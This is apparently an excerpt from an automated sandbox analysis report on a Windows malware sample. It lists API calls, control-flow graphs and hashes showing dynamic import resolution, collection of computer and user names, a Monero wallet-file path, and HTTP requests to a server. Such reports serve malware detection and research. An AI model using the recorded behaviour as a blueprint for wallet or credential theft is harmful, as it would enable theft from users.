1023->1024 1024->1021
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00934915
                                • StrCmpCA.SHLWAPI(?,015BFC50), ref: 0093493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00934ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00950DDB,00000000,?,?,00000000,?,",00000000,?,015BFC60), ref: 00934DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00934E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00934E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00934E49
                                • InternetCloseHandle.WININET(00000000), ref: 00934EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00934EC5
                                • HttpOpenRequestA.WININET(00000000,015BFAC0,?,015BF098,00000000,00000000,00400100,00000000), ref: 00934B15
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • InternetCloseHandle.WININET(00000000), ref: 00934ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: 605e2cbfab5fde44456cb7a41a5fe921397304998a80f305f2f629f3f56ecaf9
                                • Instruction ID: 242705127d79173be2e7755ded0450c764b67662c7be961f13c8b58c1683e81a
                                • Opcode Fuzzy Hash: 605e2cbfab5fde44456cb7a41a5fe921397304998a80f305f2f629f3f56ecaf9
                                • Instruction Fuzzy Hash: E112EA72950118AAEB19EB90DCA2FEEB378FF94304F514199B10663191EF702F49CF66
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 81c4767dcb64397c1b14623a2ee5d0f24c547e1020d3b23c5a4e1a6588ce0544
                                • Instruction ID: 141e3c857e02dfc20a55d0435e074817dd93af7d3a2f1a425a45ab724320d942
                                • Opcode Fuzzy Hash: 81c4767dcb64397c1b14623a2ee5d0f24c547e1020d3b23c5a4e1a6588ce0544
                                • Instruction Fuzzy Hash: 810181B1A04208EBC754DF99DD45FAEFBBCFB44B21F10425AFA45E3280D77459448BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: bb2efe31865066094cf7f7628668bc26ce07e474e99a9806aff3a3fd48bfb4fe
                                • Instruction ID: d2e8a672d4b882b1481760b3cd24d3a066ae4faca9ef5b2f0a37785e7d6ae4c9
                                • Opcode Fuzzy Hash: bb2efe31865066094cf7f7628668bc26ce07e474e99a9806aff3a3fd48bfb4fe
                                • Instruction Fuzzy Hash: 6FF04FB1944208AFC714DF98DD4AFAEFBB8EB44711F10065AFA05A3680C77819448BA2
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 59362cef8abfdb3d57d551ac67321eda20de4781f0c868711c10ec224dd8516b
                                • Instruction ID: 0f90b748f216af56805f1b9ddcd8cc7a3a25760013c21e6096c1af7058fee9e7
                                • Opcode Fuzzy Hash: 59362cef8abfdb3d57d551ac67321eda20de4781f0c868711c10ec224dd8516b
                                • Instruction Fuzzy Hash: DAD05E7490430CDBCB04DFE0D8496DDBB78FB48312F000555D90963340EE3068C2CAA6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 949c10-949c1a 634 94a036-94a0ca LoadLibraryA * 8 633->634 635 949c20-94a031 GetProcAddress * 43 633->635 636 94a146-94a14d 634->636 637 94a0cc-94a141 GetProcAddress * 5 634->637 635->634 638 94a216-94a21d 636->638 639 94a153-94a211 GetProcAddress * 8 636->639 637->636 640 94a21f-94a293 GetProcAddress * 5 638->640 641 94a298-94a29f 638->641 639->638 640->641 642 94a2a5-94a332 GetProcAddress * 6 641->642 643 94a337-94a33e 641->643 642->643 644 94a344-94a41a GetProcAddress * 9 643->644 645 94a41f-94a426 643->645 644->645 646 94a4a2-94a4a9 645->646 647 94a428-94a49d GetProcAddress * 5 645->647 648 94a4dc-94a4e3 646->648 649 94a4ab-94a4d7 GetProcAddress * 2 646->649 647->646 650 94a515-94a51c 648->650 651 94a4e5-94a510 GetProcAddress * 2 648->651 649->648 652 94a612-94a619 650->652 653 94a522-94a60d GetProcAddress * 10 650->653 651->650 654 94a67d-94a684 652->654 655 94a61b-94a678 GetProcAddress * 4 652->655 653->652 656 94a686-94a699 GetProcAddress 654->656 657 94a69e-94a6a5 654->657 655->654 656->657 658 94a6a7-94a703 GetProcAddress * 4 657->658 659 94a708-94a709 657->659 658->659
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,015A5870), ref: 00949C2D
                                • GetProcAddress.KERNEL32(74DD0000,015A5730), ref: 00949C45
                                • GetProcAddress.KERNEL32(74DD0000,015B9670), ref: 00949C5E
                                • GetProcAddress.KERNEL32(74DD0000,015B9688), ref: 00949C76
                                • GetProcAddress.KERNEL32(74DD0000,015B96A0), ref: 00949C8E
                                • GetProcAddress.KERNEL32(74DD0000,015B96B8), ref: 00949CA7
                                • GetProcAddress.KERNEL32(74DD0000,015ABD88), ref: 00949CBF
                                • GetProcAddress.KERNEL32(74DD0000,015BE1B8), ref: 00949CD7
                                • GetProcAddress.KERNEL32(74DD0000,015BE050), ref: 00949CF0
                                • GetProcAddress.KERNEL32(74DD0000,015BE1E8), ref: 00949D08
                                • GetProcAddress.KERNEL32(74DD0000,015BE068), ref: 00949D20
                                • GetProcAddress.KERNEL32(74DD0000,015A5A70), ref: 00949D39
                                • GetProcAddress.KERNEL32(74DD0000,015A5750), ref: 00949D51
                                • GetProcAddress.KERNEL32(74DD0000,015A57D0), ref: 00949D69
                                • GetProcAddress.KERNEL32(74DD0000,015A58B0), ref: 00949D82
                                • GetProcAddress.KERNEL32(74DD0000,015BE110), ref: 00949D9A
                                • GetProcAddress.KERNEL32(74DD0000,015BE0B0), ref: 00949DB2
                                • GetProcAddress.KERNEL32(74DD0000,015ABB58), ref: 00949DCB
                                • GetProcAddress.KERNEL32(74DD0000,015A5970), ref: 00949DE3
                                • GetProcAddress.KERNEL32(74DD0000,015BE218), ref: 00949DFB
                                • GetProcAddress.KERNEL32(74DD0000,015BE230), ref: 00949E14
                                • GetProcAddress.KERNEL32(74DD0000,015BDF48), ref: 00949E2C
                                • GetProcAddress.KERNEL32(74DD0000,015BE0F8), ref: 00949E44
                                • GetProcAddress.KERNEL32(74DD0000,015A5990), ref: 00949E5D
                                • GetProcAddress.KERNEL32(74DD0000,015BE0E0), ref: 00949E75
                                • GetProcAddress.KERNEL32(74DD0000,015BE200), ref: 00949E8D
                                • GetProcAddress.KERNEL32(74DD0000,015BE098), ref: 00949EA6
                                • GetProcAddress.KERNEL32(74DD0000,015BE128), ref: 00949EBE
                                • GetProcAddress.KERNEL32(74DD0000,015BDFF0), ref: 00949ED6
                                • GetProcAddress.KERNEL32(74DD0000,015BE080), ref: 00949EEF
                                • GetProcAddress.KERNEL32(74DD0000,015BE0C8), ref: 00949F07
                                • GetProcAddress.KERNEL32(74DD0000,015BDFC0), ref: 00949F1F
                                • GetProcAddress.KERNEL32(74DD0000,015BE140), ref: 00949F38
                                • GetProcAddress.KERNEL32(74DD0000,015BA330), ref: 00949F50
                                • GetProcAddress.KERNEL32(74DD0000,015BE188), ref: 00949F68
                                • GetProcAddress.KERNEL32(74DD0000,015BDF90), ref: 00949F81
                                • GetProcAddress.KERNEL32(74DD0000,015A59D0), ref: 00949F99
                                • GetProcAddress.KERNEL32(74DD0000,015BE158), ref: 00949FB1
                                • GetProcAddress.KERNEL32(74DD0000,015A59F0), ref: 00949FCA
                                • GetProcAddress.KERNEL32(74DD0000,015BE038), ref: 00949FE2
                                • GetProcAddress.KERNEL32(74DD0000,015BDF60), ref: 00949FFA
                                • GetProcAddress.KERNEL32(74DD0000,015A5A10), ref: 0094A013
                                • GetProcAddress.KERNEL32(74DD0000,015A5C90), ref: 0094A02B
                                • LoadLibraryA.KERNEL32(015BDFA8,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A03D
                                • LoadLibraryA.KERNEL32(015BDF78,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A04E
                                • LoadLibraryA.KERNEL32(015BE170,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A060
                                • LoadLibraryA.KERNEL32(015BE1A0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A072
                                • LoadLibraryA.KERNEL32(015BDFD8,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A083
                                • LoadLibraryA.KERNEL32(015BE008,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A095
                                • LoadLibraryA.KERNEL32(015BE1D0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A0A7
                                • LoadLibraryA.KERNEL32(015BE020,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A0B8
                                • GetProcAddress.KERNEL32(75290000,015A5D30), ref: 0094A0DA
                                • GetProcAddress.KERNEL32(75290000,015BE500), ref: 0094A0F2
                                • GetProcAddress.KERNEL32(75290000,015B9028), ref: 0094A10A
                                • GetProcAddress.KERNEL32(75290000,015BE3F8), ref: 0094A123
                                • GetProcAddress.KERNEL32(75290000,015A5CB0), ref: 0094A13B
                                • GetProcAddress.KERNEL32(734C0000,015AB9C8), ref: 0094A160
                                • GetProcAddress.KERNEL32(734C0000,015A5CD0), ref: 0094A179
                                • GetProcAddress.KERNEL32(734C0000,015AB8B0), ref: 0094A191
                                • GetProcAddress.KERNEL32(734C0000,015BE3B0), ref: 0094A1A9
                                • GetProcAddress.KERNEL32(734C0000,015BE410), ref: 0094A1C2
                                • GetProcAddress.KERNEL32(734C0000,015A5CF0), ref: 0094A1DA
                                • GetProcAddress.KERNEL32(734C0000,015A5B90), ref: 0094A1F2
                                • GetProcAddress.KERNEL32(734C0000,015BE2F0), ref: 0094A20B
                                • GetProcAddress.KERNEL32(752C0000,015A5AB0), ref: 0094A22C
                                • GetProcAddress.KERNEL32(752C0000,015A5E10), ref: 0094A244
                                • GetProcAddress.KERNEL32(752C0000,015BE4E8), ref: 0094A25D
                                • GetProcAddress.KERNEL32(752C0000,015BE458), ref: 0094A275
                                • GetProcAddress.KERNEL32(752C0000,015A5BF0), ref: 0094A28D
                                • GetProcAddress.KERNEL32(74EC0000,015AB9F0), ref: 0094A2B3
                                • GetProcAddress.KERNEL32(74EC0000,015AB950), ref: 0094A2CB
                                • GetProcAddress.KERNEL32(74EC0000,015BE470), ref: 0094A2E3
                                • GetProcAddress.KERNEL32(74EC0000,015A5E30), ref: 0094A2FC
                                • GetProcAddress.KERNEL32(74EC0000,015A5D50), ref: 0094A314
                                • GetProcAddress.KERNEL32(74EC0000,015ABA68), ref: 0094A32C
                                • GetProcAddress.KERNEL32(75BD0000,015BE278), ref: 0094A352
                                • GetProcAddress.KERNEL32(75BD0000,015A5BB0), ref: 0094A36A
                                • GetProcAddress.KERNEL32(75BD0000,015B8F28), ref: 0094A382
                                • GetProcAddress.KERNEL32(75BD0000,015BE2A8), ref: 0094A39B
                                • GetProcAddress.KERNEL32(75BD0000,015BE530), ref: 0094A3B3
                                • GetProcAddress.KERNEL32(75BD0000,015A5C50), ref: 0094A3CB
                                • GetProcAddress.KERNEL32(75BD0000,015A5AD0), ref: 0094A3E4
                                • GetProcAddress.KERNEL32(75BD0000,015BE4B8), ref: 0094A3FC
                                • GetProcAddress.KERNEL32(75BD0000,015BE320), ref: 0094A414
                                • GetProcAddress.KERNEL32(75A70000,015A5B10), ref: 0094A436
                                • GetProcAddress.KERNEL32(75A70000,015BE290), ref: 0094A44E
                                • GetProcAddress.KERNEL32(75A70000,015BE4D0), ref: 0094A466
                                • GetProcAddress.KERNEL32(75A70000,015BE518), ref: 0094A47F
                                • GetProcAddress.KERNEL32(75A70000,015BE248), ref: 0094A497
                                • GetProcAddress.KERNEL32(75450000,015A5C70), ref: 0094A4B8
                                • GetProcAddress.KERNEL32(75450000,015A5AF0), ref: 0094A4D1
                                • GetProcAddress.KERNEL32(75DA0000,015A5D10), ref: 0094A4F2
                                • GetProcAddress.KERNEL32(75DA0000,015BE2D8), ref: 0094A50A
                                • GetProcAddress.KERNEL32(6F280000,015A5DB0), ref: 0094A530
                                • GetProcAddress.KERNEL32(6F280000,015A5D70), ref: 0094A548
                                • GetProcAddress.KERNEL32(6F280000,015A5E50), ref: 0094A560
                                • GetProcAddress.KERNEL32(6F280000,015BE4A0), ref: 0094A579
                                • GetProcAddress.KERNEL32(6F280000,015A5B30), ref: 0094A591
                                • GetProcAddress.KERNEL32(6F280000,015A5B50), ref: 0094A5A9
                                • GetProcAddress.KERNEL32(6F280000,015A5D90), ref: 0094A5C2
                                • GetProcAddress.KERNEL32(6F280000,015A5C10), ref: 0094A5DA
                                • GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 0094A5F1
                                • GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 0094A607
                                • GetProcAddress.KERNEL32(75AF0000,015BE308), ref: 0094A629
                                • GetProcAddress.KERNEL32(75AF0000,015B8F38), ref: 0094A641
                                • GetProcAddress.KERNEL32(75AF0000,015BE338), ref: 0094A659
                                • GetProcAddress.KERNEL32(75AF0000,015BE350), ref: 0094A672
                                • GetProcAddress.KERNEL32(75D90000,015A5DF0), ref: 0094A693
                                • GetProcAddress.KERNEL32(6F9D0000,015BE2C0), ref: 0094A6B4
                                • GetProcAddress.KERNEL32(6F9D0000,015A5DD0), ref: 0094A6CD
                                • GetProcAddress.KERNEL32(6F9D0000,015BE488), ref: 0094A6E5
                                • GetProcAddress.KERNEL32(6F9D0000,015BE260), ref: 0094A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: f32a9d1bbe830ce7b05c094ee30e1c8c38dbf57f8c75c60c5cb88f958b9fecfc
                                • Instruction ID: 91de966e16298bd3e484c94aa6f37a2f66022c045ce782f52fac566706700196
                                • Opcode Fuzzy Hash: f32a9d1bbe830ce7b05c094ee30e1c8c38dbf57f8c75c60c5cb88f958b9fecfc
                                • Instruction Fuzzy Hash: 286207B5514200AFD3C8DFA8ED8996E3BF9F7CC601714851AA61DC3264DE39A8C1DB63

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 936280-93630b call 94a7a0 call 9347b0 call 94a740 InternetOpenA StrCmpCA 1040 936314-936318 1033->1040 1041 93630d 1033->1041 1042 936509-936525 call 94a7a0 call 94a800 * 2 1040->1042 1043 93631e-936342 InternetConnectA 1040->1043 1041->1040 1063 936528-93652d 1042->1063 1044 936348-93634c 1043->1044 1045 9364ff-936503 InternetCloseHandle 1043->1045 1047 93635a 1044->1047 1048 93634e-936358 1044->1048 1045->1042 1050 936364-936392 HttpOpenRequestA 1047->1050 1048->1050 1052 9364f5-9364f9 InternetCloseHandle 1050->1052 1053 936398-93639c 1050->1053 1052->1045 1055 9363c5-936405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 93639e-9363bf InternetSetOptionA 1053->1056 1058 936407-936427 call 94a740 call 94a800 * 2 1055->1058 1059 93642c-93644b call 948940 1055->1059 1056->1055 1058->1063 1066 9364c9-9364e9 call 94a740 call 94a800 * 2 1059->1066 1067 93644d-936454 1059->1067 1066->1063 1069 9364c7-9364ef InternetCloseHandle 1067->1069 1070 936456-936480 InternetReadFile 1067->1070 1069->1052 1074 936482-936489 1070->1074 1075 93648b 1070->1075 1074->1075 1079 93648d-9364c5 call 94a9b0 call 94a8a0 call 94a800 1074->1079 1075->1069 1079->1070
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                • StrCmpCA.SHLWAPI(?,015BFC50), ref: 00936303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                • HttpOpenRequestA.WININET(00000000,GET,?,015BF098,00000000,00000000,00400100,00000000), ref: 00936385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009363FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0093646D
                                • InternetCloseHandle.WININET(00000000), ref: 009364EF
                                • InternetCloseHandle.WININET(00000000), ref: 009364F9
                                • InternetCloseHandle.WININET(00000000), ref: 00936503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
